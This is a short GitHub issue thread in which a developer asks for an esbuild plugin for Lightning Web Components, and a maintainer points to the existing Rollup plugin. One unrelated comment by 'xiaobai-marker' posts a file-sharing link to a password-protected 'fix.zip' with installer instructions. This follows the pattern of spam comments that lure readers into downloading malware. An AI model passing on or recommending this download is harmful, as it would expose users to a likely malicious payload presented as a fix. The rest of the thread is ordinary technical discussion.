### ISSUE TITLE
Esbuild plugin to build LWC apps

### ISSUE THREAD

**Issue by AllanOricil** [salesforce/lwc#4486]
**Is your feature request related to a problem? Please describe.**
No

**Describe the solution you'd like**
I'm looking for an esbuild plugin that can build js that import lwc components. (somewhat similar to a webpack loader)

I have an entrypoint which imports an lwc app. This lwc app is the module that puts the whole lwc together. I want to pass this entrypoint to esbuild so that it can do its magic and bundle the whole thing to me

index.js
````js

// NOTE: this lwc component behaves as the root element of the application. The same way Vue works
import MyLwcApp from "./lwc/app"

export default function(){
     ...

     // NOTE: the app will be mounted in a dom element <div id="lwc-app"></div>
     const lwcAppElm = document.body.getElementById("lwc-app");
     MyLwcApp(lwcAppElm);

     ...
}

````

**Describe alternatives you've considered**
I could not find a plugin

**Additional context**
I'm building some stuff using vue, which is bundled using esbuild, and I would like to be able to use LWC too.

**Comment by xiaobai-marker** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by AllanOricil** [comment]
?

**Comment by nolanlawson** [comment]
FWIW the existing `@lwc/rollup-plugin` works [out-of-the-box](https://git.soma.salesforce.com/nlawson/lwc-vitest-demo) with Vitest, which is built on Vite, which is built on ESBuild. So it's possible that it works with ESBuild directly as well. (I haven't tested though.)

Currently though our only officially supported bundler is Rollup.

**Comment by AllanOricil** [comment]
I thought esbuild was "the" primary bundler but apparently it is not, according to this [answer](https://github.com/vitejs/vite/discussions/7622). Both rollup and esbuild will be changed by rollup's rust version. So, Im closing this, as it seems it doesn't make sense to invest time on a tool which is already dead, apparently.
